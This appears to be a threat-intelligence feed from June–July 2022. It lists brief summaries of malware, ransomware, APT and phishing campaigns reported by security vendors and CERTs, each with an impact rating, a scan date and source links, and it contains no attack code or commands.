A_new_variant_of_QakBot
Date of Scan:
2022-07-21
Impact:
LOW
Summary:
Fortinet’s researchers observed a phishing email, part of a phishing campaign, spreading a new variant of QakBot.
Source: https://www.fortinet.com/blog/threat-research/new-variant-of-qakbot-spread-by-phishing-emails?&web_view=true
2022-07-21
PyAutoGUI_lets_your_Python_scripts_control_the_mouse_and_keyboard
LOW
+
Intel Source:
ISC SANS
Intel Name:
PyAutoGUI_lets_your_Python_scripts_control_the_mouse_and_keyboard
Date of Scan:
2022-07-21
Impact:
LOW
Summary:
ISC SANS analyzed a malicious Python script that uses PyAutoGUI, a library that lets Python scripts control the mouse and keyboard, to automate interactions with other applications.
Source: https://isc.sans.edu/diary/Malicious+Python+Script+Behaving+Like+a+Rubber+Ducky/28860
2022-07-21
SmokeLoader_malware_leveraging_Amadey_Bot
LOW
+
Intel Source:
ASEC
Intel Name:
SmokeLoader_malware_leveraging_Amadey_Bot
Date of Scan:
2022-07-21
Impact:
LOW
Summary:
ASEC researchers discovered that Amadey Bot is being installed by SmokeLoader. Amadey Bot is capable of stealing information and installing additional malware by receiving commands from the attacker, while SmokeLoader acts as a downloader used to install additional malware strains.
Source: https://asec.ahnlab.com/en/36634/
2022-07-21
CloudMensis_spyware_targets_MacOS_systems
LOW
+
Intel Source:
WeLivesecurity
Intel Name:
CloudMensis_spyware_targets_MacOS_systems
Date of Scan:
2022-07-21
Impact:
LOW
Summary:
Researchers from ESET discovered a previously undetected macOS backdoor, tracked as CloudMensis, that targets macOS systems and exclusively uses public cloud storage services as C2.
Source: https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/ https://www.jamf.com/blog/cloudmensis-malware/
2022-07-21
Threat_actors_leveraging_AgentTesla_to_target_Ukraine_state_bodies
LOW
+
Intel Source:
Cert-UA
Intel Name:
Threat_actors_leveraging_AgentTesla_to_target_Ukraine_state_bodies
Date of Scan:
2022-07-21
Impact:
LOW
Summary:
CERT-UA discovered the file "Report_050722_4.ppt", which contains a thumbnail image that mentions the operational command "South". If the document is opened and the macro activated, the macro creates the files "gksg023ig.lnk" and "sgegkseg23mjl.exe" and executes the LNK file using rundll32.exe, which in turn launches the mentioned EXE file.
Source: https://cert.gov.ua/article/861292
2022-07-20
8220_Gang_Massively_Expands_Cloud_Botnet
MEDIUM
+
Intel Source:
Sentinelone
Intel Name:
8220_Gang_Massively_Expands_Cloud_Botnet
Date of Scan:
2022-07-20
Impact:
MEDIUM
Summary:
Over the last month, a crimeware group best known as 8220 Gang has expanded its botnet to roughly 30,000 hosts globally through the use of Linux and common cloud application vulnerabilities and poorly secured configurations.
Source: https://www.sentinelone.com/blog/from-the-front-lines-8220-gang-massively-expands-cloud-botnet-to-30000-infected-hosts/
2022-07-20
WatchDog_Adds_Steganography_in_Cryptojacking_Operations
LOW
+
Intel Source:
Lacework
Intel Name:
WatchDog_Adds_Steganography_in_Cryptojacking_Operations
Date of Scan:
2022-07-20
Impact:
LOW
Summary:
Researchers from Lacework reported that WatchDog’s cryptojacking campaign has adopted a steganography technique for malware propagation and other objectives. The XMRig miner was disguised as an image and hosted on compromised cloud storage (Alibaba Object Storage Service).
Source: https://www.lacework.com/blog/how-watchdog-smuggles-malware-into-your-network-as-uninteresting-photos/
2022-07-20
Open_Document_malware_targets_Latin_American_Hotels
LOW
+
Intel Source:
HP Wolf Security
Intel Name:
Open_Document_malware_targets_Latin_American_Hotels
Date of Scan:
2022-07-20
Impact:
LOW
Summary:
Researchers from HP Wolf Security analyzed a stealthy malware campaign which uses OpenDocument text (.odt) files to distribute malware. The campaign targets the hotel industry in Latin America.
Source: https://threatresearch.ext.hp.com/stealthy-opendocument-malware-targets-latin-american-hotels/?web_view=true
2022-07-20
Industrial_Espionage_Operation_explained
MEDIUM
+
Intel Source:
BitDefender
Intel Name:
Industrial_Espionage_Operation_explained
Date of Scan:
2022-07-20
Impact:
MEDIUM
Summary:
Researchers from Bitdefender analyzed an incident that turned out to be an industrial espionage operation. In this attack the attacker managed to compromise a Patient Zero computer and used it to establish a secondary access avenue through a web shell planted on the company’s Exchange Server.
Source: https://www.bitdefender.com/blog/labs/under-siege-for-months-the-anatomy-of-an-industrial-espionage-operation/ https://www.bitdefender.com/files/News/CaseStudies/study/421/Bitdefender-PR-Whitepaper-IndEs-creat6269-en-EN.pdf
2022-07-19
APT29_Group_leveraging_Online_Storage_Services
MEDIUM
+
Intel Source:
Palo Alto
Intel Name:
APT29_Group_leveraging_Online_Storage_Services
Date of Scan:
2022-07-19
Impact:
MEDIUM
Summary:
Palo Alto Networks researchers noticed that Russian SVR hackers are using Google Drive and Dropbox to evade detection. APT29 has adopted this new tactic in recent campaigns targeting Western diplomatic missions and foreign embassies worldwide.
Source: https://unit42.paloaltonetworks.com/cloaked-ursa-online-storage-services-campaigns/
2022-07-19
Pegasus_Spyware_Used_Against_Thailand_s_Pro_Democracy_Movement
LOW
+
Intel Source:
Citizen Lab
Intel Name:
Pegasus_Spyware_Used_Against_Thailand_s_Pro_Democracy_Movement
Date of Scan:
2022-07-19
Impact:
LOW
Summary:
Citizen Lab discovered an extensive espionage campaign targeting Thai pro-democracy protesters and activists calling for reforms to the monarchy.
Source: https://citizenlab.ca/2022/07/geckospy-pegasus-spyware-used-against-thailands-pro-democracy-movement/
2022-07-19
Lazarus_Forged_Analysis_Report_on_Ecommerce_Component_Attack_Activities
MEDIUM
+
Intel Source:
Weixin
Intel Name:
Lazarus_Forged_Analysis_Report_on_Ecommerce_Component_Attack_Activities
Date of Scan:
2022-07-19
Impact:
MEDIUM
Summary:
The APT-C-26 (Lazarus) group had a clear purpose in this attack: it continued its activity by disguising the malware as an Alibaba-related component. The payload component is related to the NukeSped family.
Source: https://mp.weixin.qq.com/s/USitU4jAg9y2XkQxbwcAPQ
2022-07-19
A_continued_exploitation_of_Log4Shell_in_VMware_Horizon_Systems
MEDIUM
+
Intel Source:
CISA
Intel Name:
A_continued_exploitation_of_Log4Shell_in_VMware_Horizon_Systems
Date of Scan:
2022-07-19
Impact:
MEDIUM
Summary:
CISA has updated the Cybersecurity Advisory AA22-174A: Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon, originally released June 23, 2022. The advisory now includes updated IOCs provided in Malware Analysis Report (MAR)-10382580-2.
Source: https://www.cisa.gov/uscert/ncas/alerts/aa22-174a
2022-07-19
Attackers_leveraging_tools_to_generate_LNK_Files_to_deliver_payload
LOW
+
Intel Source:
Resecurity
Intel Name:
Attackers_leveraging_tools_to_generate_LNK_Files_to_deliver_payload
Date of Scan:
2022-07-19
Impact:
LOW
Summary:
Threat hunters from Resecurity have identified popular tools used by cybercriminals: attackers are actively leveraging tools that let them generate malicious shortcut files (.LNK files) for payload delivery.
Source: https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise?&web_view=true
2022-07-18
Elastix_VoIP_systems_hacked_in_massive_campaign
LOW
+
Intel Source:
Palo Alto
Intel Name:
Elastix_VoIP_systems_hacked_in_massive_campaign
Date of Scan:
2022-07-18
Impact:
LOW
Summary:
Recently, Palo Alto Unit 42 observed another operation that targets the Elastix system used in Digium phones. The attacker implants a web shell to exfiltrate data by downloading and executing additional payloads inside the target's Digium phone software (a FreePBX module written in PHP).
Source: https://unit42.paloaltonetworks.com/digium-phones-web-shell/
2022-07-18
Phishing_campaign_involving_Emotet
LOW
+
Intel Source:
Cyfirma
Intel Name:
Phishing_campaign_involving_Emotet
Date of Scan:
2022-07-18
Impact:
LOW
Summary:
Cyfirma researchers noticed multiple phishing campaigns involving Emotet, which is dropped through an Excel 4.0 (.xls) file attachment.
Source: https://media-exp2.licdn.com/dms/document/C561FAQFQ1G-qDcfWog/feedshare-document-pdf-analyzed/0/1658115611369?e=1658966400&v=beta&t=CrzicOViop8aDfMYLyTPjPGNhnX18D5OEvX1tTKP-sI
2022-07-16
Sudden_Increase_In_Attacks_On_Modern_WPBakery_Page_Builder_Addons_Vulnerability
LOW
+
Intel Source:
Wordfence
Intel Name:
Sudden_Increase_In_Attacks_On_Modern_WPBakery_Page_Builder_Addons_Vulnerability
Date of Scan:
2022-07-16
Impact:
LOW
Summary:
The Wordfence Threat Intelligence team has observed a spike in attack attempts targeting Kaswara Modern WPBakery Page Builder Addons. This ongoing campaign aims to take advantage of an arbitrary file upload vulnerability, tracked as CVE-2021-24284, which was previously disclosed and has not been patched in the now-closed plugin.
Source: https://www.wordfence.com/blog/2022/07/attacks-on-modern-wpbakery-page-builder-addons-vulnerability/
2022-07-16
The_Maha_grass_group_attack_activity_against_Pakistan
LOW
+
Intel Source:
Qianxin Blog
Intel Name:
The_Maha_grass_group_attack_activity_against_Pakistan
Date of Scan:
2022-07-16
Impact:
LOW
Summary:
Recently the Red Raindrop team of Qi'anxin Threat Intelligence Center observed several attack samples of the group during daily threat hunting. In this attack, the attacker uses an RTF file that exploits a vulnerability to carry out a spear-phishing attack.
Source: https://ti.qianxin.com/blog/articles/analysis-of-the-attack-activities-of-patchwork-using-the-documents-of-relevant-government-agencies-in-pakistan-as-bait/
2022-07-16
The_Newly_Emerged_BlueSky_Ransomware
MEDIUM
+
Intel Source:
Cloudsek
Intel Name:
The_Newly_Emerged_BlueSky_Ransomware
Date of Scan:
2022-07-16
Impact:
MEDIUM
Summary:
CloudSEK discovered a financially motivated ransomware group, dubbed BlueSky, speculated to be connected to the Conti ransomware group.
Source: https://cloudsek.com/threatintelligence/tracking-the-operators-of-the-newly-emerged-bluesky-ransomware/
2022-07-15
Indian_APT_group_Confucius_targets_Pakistan_government_and_military_institutions
LOW
+
Intel Source:
Antiy Group
Intel Name:
Indian_APT_group_Confucius_targets_Pakistan_government_and_military_institutions
Date of Scan:
2022-07-15
Impact:
LOW
Summary:
Antiy Group researchers published their findings on Indian APT Confucius campaigns targeting the Pakistani government and military institutions.
Source: https://mp.weixin.qq.com/s/n6XQAGtNEXfPZXp1mlwDTQ
2022-07-15
UAC_0100_group_leveraging_Online_Fraud_to_target_Ukraine
LOW
+
Intel Source:
CERT-UA
Intel Name:
UAC_0100_group_leveraging_Online_Fraud_to_target_Ukraine
Date of Scan:
2022-07-15
Impact:
LOW
Summary:
CERT-UA has discovered fraudulent pages on Facebook containing links to a "Unified Compensation Center for the Return of Unpaid Funds". The fraudulent pages prompt users to provide personal information and make payments, harvesting their payment card details.
Source: https://cert.gov.ua/article/761668
2022-07-15
ApolloRat_Malware_compiled_using_Nuitka
LOW
+
Intel Source:
Cyble
Intel Name:
ApolloRat_Malware_compiled_using_Nuitka
Date of Scan:
2022-07-15
Impact:
LOW
Summary:
Cyble's research team has discovered a new RAT dubbed ApolloRAT. It is written in Python and uses Discord as its command and control (C&C) server.
Source: https://blog.cyble.com/2022/07/14/apollorat-evasive-malware-compiled-using-nuitka/
2022-07-15
Everest_Ransomware_new_TTPs_and_relation_to_Black_Byte
MEDIUM
+
Intel Source:
NCC Group
Intel Name:
Everest_Ransomware_new_TTPs_and_relation_to_Black_Byte
Date of Scan:
2022-07-15
Impact:
MEDIUM
Summary:
Researchers at NCC Group analysed an Everest ransomware sample and assess with medium confidence that Everest ransomware is related to BlackByte. They also documented new TTPs employed by the Everest ransomware group.
Source: https://research.nccgroup.com/2022/07/13/climbing-mount-everest-black-byte-bytes-back/
2022-07-15
North_Korean_threat_actors_uses_H0lyGh0st_ransomware
MEDIUM
+
Intel Source:
Microsoft
Intel Name:
North_Korean_threat_actors_uses_H0lyGh0st_ransomware
Date of Scan:
2022-07-15
Impact:
MEDIUM
Summary:
Microsoft Threat Intelligence Center is tracking a threat group, DEV-0530, that is using H0lyGh0st ransomware to target small and midsize businesses.
Source: https://www.microsoft.com/security/blog/2022/07/14/north-korean-threat-actor-targets-small-and-midsize-businesses-with-h0lygh0st-ransomware/
2022-07-15
New_campaign_ongoing_by_Transparent_Tribe_APT_group
LOW
+
Intel Source:
Cisco Talos
Intel Name:
New_campaign_ongoing_by_Transparent_Tribe_APT_group
Date of Scan:
2022-07-15
Impact:
LOW
Summary:
Researchers at Cisco Talos have discovered a malicious campaign targeting students of universities and colleges in India. This also suggests that the APT is actively expanding its network of victims to include civilian users.
Source: https://blog.talosintelligence.com/2022/07/transparent-tribe-targets-education.html
2022-07-07
NorthKorean_Threat_actors_uses_Maui_Ransomware
MEDIUM
+
Intel Source:
CISA
Intel Name:
NorthKorean_Threat_actors_uses_Maui_Ransomware
Date of Scan:
2022-07-07
Impact:
MEDIUM
Summary:
A joint CSA has been released by the FBI, CISA and DOT about Maui ransomware being used by North Korean threat actors to target the Healthcare and Public Health Sector.
Source: https://www.cisa.gov/uscert/ncas/alerts/aa22-187a
2022-07-07
NoMercy_Stealer_Rapidly_Evolving_Into_Clipper_Malware
LOW
+
Intel Source:
Cyble
Intel Name:
NoMercy_Stealer_Rapidly_Evolving_Into_Clipper_Malware
Date of Scan:
2022-07-07
Impact:
LOW
Summary:
Cyble threat hunters discovered a new stealer named “NoMercy”. The investigation indicated that the stealer is a very crude and simple information stealer in its initial stages, and the TAs behind it are actively modifying the stealer and adding additional capabilities.
Source: https://blog.cyble.com/2022/07/07/nomercy-stealer-adding-new-features/
2022-07-07
A_cryptomining_campaign_targets_Linux_servers
LOW
+
Intel Source:
Security Affairs
Intel Name:
A_cryptomining_campaign_targets_Linux_servers
Date of Scan:
2022-07-07
Impact:
LOW
Summary:
Microsoft Security Intelligence experts are warning of a long-running campaign conducted by a cloud threat actor group, tracked as 8220, that is now targeting Linux servers to install crypto miners.
Source: https://securityaffairs.co/wordpress/132777/cyber-crime/8220-cryptomining-campaign.html https://blog.aquasec.com/8220-gang-confluence-vulnerability-cve-2022-26134
2022-07-07
Phishing_tax_scam_at_Canada
LOW
+
Intel Source:
Welivesecurity
Intel Name:
Phishing_tax_scam_at_Canada
Date of Scan:
2022-07-07
Impact:
LOW
Summary:
Phishing scammers pose as the Canadian tax agency ahead of Canada Day.
Source: https://www.welivesecurity.com/2022/07/01/phishing-scam-posing-canadian-tax-agency-canada-day/
2022-07-07
Threat_Actors_abusing_Red_teaming_tools
MEDIUM
+
Intel Source:
Palo Alto
Intel Name:
Threat_Actors_abusing_Red_teaming_tools
Date of Scan:
2022-07-07
Impact:
MEDIUM
Summary:
Palo Alto Unit 42 recently hunted down new samples that match known advanced persistent threat (APT) patterns and tactics. Evaluation of these samples raised obvious detection concerns: they contained a malicious payload associated with Brute Ratel C4 (BRc4), the newest red-teaming and adversarial attack simulation tool to hit the market.
Source: https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/
2022-07-07
Orbit_Malware_targeting_Linux_goes_undetected
LOW
+
Intel Source:
Intezer
Intel Name:
Orbit_Malware_targeting_Linux_goes_undetected
Date of Scan:
2022-07-07
Impact:
LOW
Summary:
Intezer researchers provided technical analysis of a new and fully undetected malware dubbed “Orbit” that is targeting Linux systems. This malware implements advanced evasion techniques and gains persistence on the machine by hooking key functions, provides the threat actors with remote access capabilities over SSH, harvests credentials, and logs TTY commands.
Source: https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/
2022-07-06
Cobalt_Strike_and_Meterpreter
LOW
+
Intel Source:
ASEC
Intel Name:
Cobalt_Strike_and_Meterpreter
Date of Scan:
2022-07-06
Impact:
LOW
Summary:
Researchers from ASEC analyzed an attack case in which Cobalt Strike and Meterpreter were installed on vulnerable MS-SQL servers to gain control. The attacker then installed AnyDesk to control the infected system through a remote desktop environment.
Source: https://asec.ahnlab.com/en/36159/
2022-07-06
Bitter_APT_targets_Bangladesh
LOW
+
Intel Source:
SecuInfra
Intel Name:
Bitter_APT_targets_Bangladesh
Date of Scan:
2022-07-06
Impact:
LOW
Summary:
Researchers from SecuInfra analyzed an attack by the Bitter APT group, which has targeted military organizations of Bangladesh.
Source: https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh/
2022-07-06
DarkComet_RAT_returned_with_new_TTPs
LOW
+
Intel Source:
SocInvestigations
Intel Name:
DarkComet_RAT_returned_with_new_TTPs
Date of Scan:
2022-07-06
Impact:
LOW
Summary:
Researchers from SocInvestigation documented the new TTPs of DarkComet RAT along with detection and response guidance. DarkComet is generally spread via phishing campaigns.
Source: https://www.socinvestigation.com/darkcomet-rat-returns-with-new-ttps-detection-response/
2022-07-06
Diving_deep_into_BumbleBee_Loader_updated_IOCs
MEDIUM
+
Intel Source:
Securonix
Intel Name:
Diving_deep_into_BumbleBee_Loader_updated_IOCs
Date of Scan:
2022-07-06
Impact:
MEDIUM
Summary:
The Securonix Threat Labs Threat Research Team has analysed a sample of BumbleBee; it appears to follow a similar delivery mechanism, which can be used to detect the initial foothold of the loader. Currently, AV detection of the BumbleBee loader is very weak as vendors work to update their signatures and heuristic detections, and the main DLL payload of this loader was very much capable of evading EDR detection at the time of publication.
Source: https://www.securonix.com/blog/securonix-threat-labs-initial-coverage-advisory-analysis-and-detection-of-bumblebee-loader-using-securonix/
2022-07-06
The_new_Hive_variant
MEDIUM
+
Intel Source:
Microsoft
Intel Name:
The_new_Hive_variant
Date of Scan:
2022-07-06
Impact:
MEDIUM
Summary:
Microsoft Threat Intelligence Center discovered the new variant while analyzing detected Hive ransomware techniques for dropping .key files.
Source: https://www.microsoft.com/security/blog/2022/07/05/hive-ransomware-gets-upgrades-in-rust/
2022-07-06
Malicious_NPM_Packages_Stealing_Data
LOW
+
Intel Source:
ReversingLabs
Intel Name:
Malicious_NPM_Packages_Stealing_Data
Date of Scan:
2022-07-06
Impact:
LOW
Summary:
ReversingLabs researchers uncovered malicious NPM packages stealing data, as evidence of a widespread software supply chain attack.
Source: https://blog.reversinglabs.com/blog/iconburst-npm-software-supply-chain-attack-grabs-data-from-apps-websites
2022-07-05
Vsingle_Malware_used_by_Lazarus_Group
MEDIUM
+
Intel Source:
JPCERT
Intel Name:
Vsingle_Malware_used_by_Lazarus_Group
Date of Scan:
2022-07-05
Impact:
MEDIUM
Summary:
Researchers from JPCERT detailed the VSingle malware used by the Lazarus group, which has been updated to retrieve C2 server information from GitHub.
Source: https://blogs.jpcert.or.jp/en/2022/07/vsingle.html
2022-07-05
Xloader_Malware_returns_with_new_infection_technique
MEDIUM
+
Intel Source:
Cyble
Intel Name:
Xloader_Malware_returns_with_new_infection_technique
Date of Scan:
2022-07-05
Impact:
MEDIUM
Summary:
Researchers at Cyble have analysed an infection chain of Xloader malware. The malware uses multiple file types such as PDF, XLSX, and RTF for its initial infection and execution. It is also designed to drop three modules in memory and execute the final payload using the process-hollowing technique.
Source: https://blog.cyble.com/2022/07/01/xloader-returns-with-new-infection-technique/
2022-07-04
SessionManager_IIS_backdoor
MEDIUM
+
Intel Source:
SecureList
Intel Name:
SessionManager_IIS_backdoor
Date of Scan:
2022-07-04
Impact:
MEDIUM
Summary:
Researchers at Securelist have been investigating an IIS backdoor called SessionManager since early 2022. SessionManager has been used against NGOs, government, military and industrial organizations in Africa, South America, Asia, Europe, Russia and the Middle East, starting from at least March 2021.
Source: https://securelist.com/the-sessionmanager-iis-backdoor/106868/
2022-07-04
YTStealer_Malware
LOW
+
Intel Source:
Intezer
Intel Name:
YTStealer_Malware
Date of Scan:
2022-07-04
Impact:
LOW
Summary:
YTStealer is malware that aims to steal YouTube authentication cookies. As a stealer, it behaves like many other stealers.
Source: https://www.intezer.com/blog/research/ytstealer-malware-youtube-cookies/
2022-07-04
GlowSand_Campaign
LOW
+
Intel Source:
Inquest
Intel Name:
GlowSand_Campaign
Date of Scan:
2022-07-04
Impact:
LOW
Summary:
Researchers at InQuest have analysed a multistage malicious document masquerading as a Ukrainian military payroll document. The document was obfuscated and geofenced to infect only Ukrainian systems.
Source: https://inquest.net/blog/2022/06/27/glowsand
2022-07-04
MedusaLocker_Ransomware
MEDIUM
+
Intel Source:
CISA
Intel Name:
MedusaLocker_Ransomware
Date of Scan:
2022-07-04
Impact:
MEDIUM
Summary:
CISA, FBI, Treasury and FinCEN released a joint advisory, in support of the #StopRansomware campaign, providing information on MedusaLocker ransomware. Observed as recently as May 2022, MedusaLocker actors predominantly rely on vulnerabilities in Remote Desktop Protocol (RDP) to access victims’ networks.
Source: https://www.cisa.gov/uscert/sites/default/files/publications/AA22-181A_stopransomware_medusalocker.pdf
2022-07-01
PennyWise_Infostealer_leveraging_YouTube_to_infect_users
LOW
+
Intel Source:
Cyble
Intel Name:
PennyWise_Infostealer_leveraging_YouTube_to_infect_users
Date of Scan:
2022-07-01
Impact:
LOW
Summary:
Cyble threat hunters discovered a new stealer named “PennyWise”. The stealer appears to have been developed recently. The investigation indicated that the stealer is an emerging threat, and the researchers witnessed multiple samples of this stealer active in the wild.
Source: https://blog.cyble.com/2022/06/30/infostealer/
2022-07-01
Countering_hack_for_hire_attacker_groups
LOW
+
Intel Source:
Google blog
Intel Name:
Countering_hack_for_hire_attacker_groups
Date of Scan:
2022-07-01
Impact:
LOW
Summary:
Google's Threat Analysis Group (TAG) on Thursday disclosed that it has blocked as many as 36 malicious domains operated by hack-for-hire groups from India, Russia, and the U.A.E. Hack-for-hire groups have been seen targeting human rights and political activists, journalists, and other high-risk users around the world, putting their privacy, safety and security at risk.
Source: https://blog.google/threat-analysis-group/countering-hack-for-hire-groups/
2022-06-30
Raccoon_Stealer_v2
LOW
+
Intel Source:
Sekoia
Intel Name:
Raccoon_Stealer_v2
Date of Scan:
2022-06-30
Impact:
LOW
Summary:
Researchers observed this week that cyber criminals are using a new and improved version of the prolific Raccoon Stealer malware, barely three months after its authors announced they were quitting.
Source: https://blog.sekoia.io/raccoon-stealer-v2-part-1-the-return-of-the-dead/
2022-06-30
Black_Basta_Ransomware_gang_added_Qakbot_and_PrintNightmare_Exploit_to_their_Arsenal
MEDIUM
+
Intel Source:
Trend Micro
Intel Name:
Black_Basta_Ransomware_gang_added_Qakbot_and_PrintNightmare_Exploit_to_their_Arsenal
Date of Scan:
2022-06-30
Impact:
MEDIUM
Summary:
Researchers at Trend Micro identified that the Black Basta ransomware group used the banking trojan QakBot as a means of entry and movement and took advantage of the PrintNightmare vulnerability to perform privileged file operations.
Source: https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html
2022-06-30
Emotet_still_abusing_Microsoft_Office_Macros
MEDIUM
+
Intel Source:
NetSkope
Intel Name:
Emotet_still_abusing_Microsoft_Office_Macros
Date of Scan:
2022-06-30
Impact:
MEDIUM
Summary:
Researchers at Netskope Threat Labs have analysed a campaign where Emotet is still being executed using malicious Microsoft Office documents. Despite the protection Microsoft released in 2022 to prevent the execution of Excel 4.0 (XLM) macros, this attack is still feasible against users running outdated versions of Office.
Source: https://www.netskope.com/blog/emotet-still-abusing-microsoft-office-macros https://github.com/netskopeoss/NetskopeThreatLabsIOCs/tree/main/Emotet/2022-06-24
2022-06-30
New_ZuoRAT_malware_targets_SOHO_router
LOW
+
Intel Source:
Lumen blog
Intel Name:
New_ZuoRAT_malware_targets_SOHO_router
Date of Scan:
2022-06-30
Impact:
LOW
Summary:
Black Lotus Labs, the threat intelligence arm of Lumen Technologies, has identified and is tracking a new and sophisticated multistage remote access trojan (RAT) that leverages infected SOHO routers to target predominantly North American and European networks of interest. This trojan grants the actor the ability to pivot into the local network and gain access to additional systems on the LAN by hijacking network communications to maintain an undetected foothold.
Source: https://blog.lumen.com/zuorat-hijacks-soho-routers-to-silently-stalk-networks/ https://github.com/blacklotuslabs/IOCs/blob/main/ZuoRAT_IoCs.txt
2022-06-29
Ukraine_targeted_by_Dark_Crystal_RAT_or_DCRat
LOW
+
Intel Source:
Fortinet
Intel Name:
Ukraine_targeted_by_Dark_Crystal_RAT_or_DCRat
Date of Scan:
2022-06-29
Impact:
LOW
Summary:
Researchers at FortiGuard Labs came across another file that was likely used in the attack campaign described by CERT-UA, based on the date of the file's submission to VirusTotal and the submission location being Ukraine. The new file, however, is in Excel (xlsx) format and contains malicious macros, instead of the docx format and exploitation of CVE-2022-30190 (Follina).
Source: https://www.fortinet.com/blog/threat-research/ukraine-targeted-by-dark-crystal-rat
2022-06-29
AstraLocker_2.0_Ransomware_distributed_from_Microsoft_Word_files
MEDIUM
+
Intel Source:
ReversingLabs
Intel Name:
AstraLocker_2.0_Ransomware_distributed_from_Microsoft_Word_files
Date of Scan:
2022-06-29
Impact:
MEDIUM
Summary:
Researchers at ReversingLabs have discovered a new version of the AstraLocker ransomware (AstraLocker 2.0) that is being distributed directly from Microsoft Office files used as bait in phishing attacks.
Source: https://blog.reversinglabs.com/blog/smash-and-grab-astralocker-2-pushes-ransomware-direct-from-office-docs
2022-06-28
Software_Cracks_Distributing_Recordbreaker_Stealer
LOW
+
Intel Source:
ASEC
Intel Name:
Software_Cracks_Distributing_Recordbreaker_Stealer
Date of Scan:
2022-06-28
Impact:
LOW
Summary:
ASEC Research Team has analysed
Source: https://asec.ahnlab.com/en/35981/
2022-06-28
ShadowPad_backdoor_and_MS_Exchange_bug_leveraged_to_attack_ICS
LOW
+
Intel Source:
Kaspersky ICS CERT
Intel Name:
ShadowPad_backdoor_and_MS_Exchange_bug_leveraged_to_attack_ICS
Date of Scan:
2022-06-28
Impact:
LOW
Summary:
Researchers at Kaspersky ICS CERT have spotted a threat actor targeting organizations in the industrial, telecommunications, logistics and transport sectors in Pakistan, Afghanistan and Malaysia, exploiting the Microsoft Exchange server vulnerability CVE-2021-26855 and downloading the ShadowPad backdoor.
Source: https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/
2022-06-28
Evilnum_APT_returns_with_new_Threat_and_TTPs
MEDIUM
+
Intel Source:
Zscaler
Intel Name:
Evilnum_APT_returns_with_new_Threat_and_TTPs
Date of Scan:
2022-06-28
Impact:
MEDIUM
Summary:
Researchers from Zscaler have been tracking the Evilnum APT group since the start of 2022 and have this time observed a newer target list and TTPs. The main distribution vector used by this threat group was Windows shortcut files (LNK) sent inside malicious archive files (ZIP) as attachments in spear-phishing emails to the victims.
Source: https://www.zscaler.com/blogs/security-research/return-evilnum-apt-updated-ttps-and-new-targets
2022-06-27
Socgholish_initiated_through_Cobalt_Strike_payloads
LOW
+
Intel Source:
Esentire
Intel Name:
Socgholish_initiated_through_Cobalt_Strike_payloads
Date of Scan:
2022-06-27
Impact:
LOW
Summary:
eSentire has observed that drive-by threats such as SocGholish, Gootkit Loader and Solarmarker are on the rise. Both SocGholish and Gootkit Loader have been linked to follow-on attacks initiated through Cobalt Strike payloads.
Source: https://www.esentire.com/blog/socgholish-to-cobalt-strike-in-10-minutes
2022-06-27
DarkCrystal_RAT_malware_attacking_Ukraining_telecom_operators
LOW
+
Intel Source:
CERT-UA
Intel Name:
DarkCrystal_RAT_malware_attacking_Ukraining_telecom_operators
Date of Scan:
2022-06-27
Impact:
LOW
Summary:
CERT-UA received information about a DarkCrystal RAT attack aimed at operators and telecommunications providers of Ukraine. It was distributed by e-mails with the subject "Free primary legal aid" and the attachment "Algorithm of actions of members of the family of a missing serviceman LegalAid.rar".
Source: https://cert.gov.ua/article/405538
2022-06-27
Python_malicious_script_executing_a_keylogger
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Python_malicious_script_executing_a_keylogger
Date of Scan:
2022-06-27
Impact:
LOW
Summary:
A researcher from ISC SANS discovered a Python script with some interesting features that can be used to conduct social engineering attacks.
Source: https://isc.sans.edu/forums/diary/Python+abusing+The+Windows+GUI/28780/
2022-06-25
BlackBastaRansomware
MEDIUM
+
Intel Source:
Cybereason
Intel Name:
BlackBastaRansomware
Date of Scan:
2022-06-25
Impact:
MEDIUM
Summary:
Researchers from Cybereason analyzed an attack by the Black Basta ransomware and provided key details about its growth since inception.
Source: https://www.cybereason.com/blog/cybereason-vs.-black-basta-ransomware
2022-06-24
New_malware_associated_with_Iranian_SiameseKitten_Group_or_Lyceum
MEDIUM
Intel Source:
ClearSky
Intel Name:
New_malware_associated_with_Iranian_SiameseKitten_Group_or_Lyceum
Date of Scan:
2022-06-24
Impact:
MEDIUM
Summary:
Researchers at ClearSky Security have discovered new malware linked to the Lyceum group. The malware is downloaded from a domain registered on June 6th, and it communicates with a previously unknown command and control server whose IP address is adjacent to that of the domain.
Source: https://www.clearskysec.com/wp-content/uploads/2022/06/Lyceum-suicide-drone-23.6.pdf
2022-06-24
Log4Shell_exploits_still_being_used_to_hack_VMware_servers
MEDIUM
Intel Source:
CISA
Intel Name:
Log4Shell_exploits_still_being_used_to_hack_VMware_servers
Date of Scan:
2022-06-24
Impact:
MEDIUM
Summary:
CISA warned today that threat actors, including state-backed hacking groups, are still targeting VMware Horizon and Unified Access Gateway (UAG) servers using the Log4Shell (CVE-2021-44228) remote code execution vulnerability.
Source: https://www.cisa.gov/uscert/ncas/alerts/aa22-174a https://www.bleepingcomputer.com/news/security/cisa-log4shell-exploits-still-being-used-to-hack-vmware-servers/
2022-06-24
Conti_ArmAttack_Campaign
MEDIUM
Intel Source:
Group-IB
Intel Name:
Conti_ArmAttack_Campaign
Date of Scan:
2022-06-24
Impact:
MEDIUM
Summary:
Group-IB researchers documented a new Conti ransomware campaign dubbed ARMattack. In this campaign the group compromised more than 40 companies, and it took them 3 days to do so.
Source: https://www.group-ib.com/media/conti-armada-report/
2022-06-24
CALISTO_Russian_Threat_Actor_continues_its_credential_harvesting_campaign
MEDIUM
Intel Source:
Sekoia
Intel Name:
CALISTO_Russian_Threat_Actor_continues_its_credential_harvesting_campaign
Date of Scan:
2022-06-24
Impact:
MEDIUM
Summary:
Sekoia's Threat & Detection Research Team followed up on Google TAG's findings on the Russian threat actor CALISTO and identified a phishing campaign in which CALISTO uses Evilginx on its VPS to capture victims' credentials. This well-known open-source tool creates an SSL reverse proxy between the victim and a legitimate website to capture web credentials and 2FA tokens.
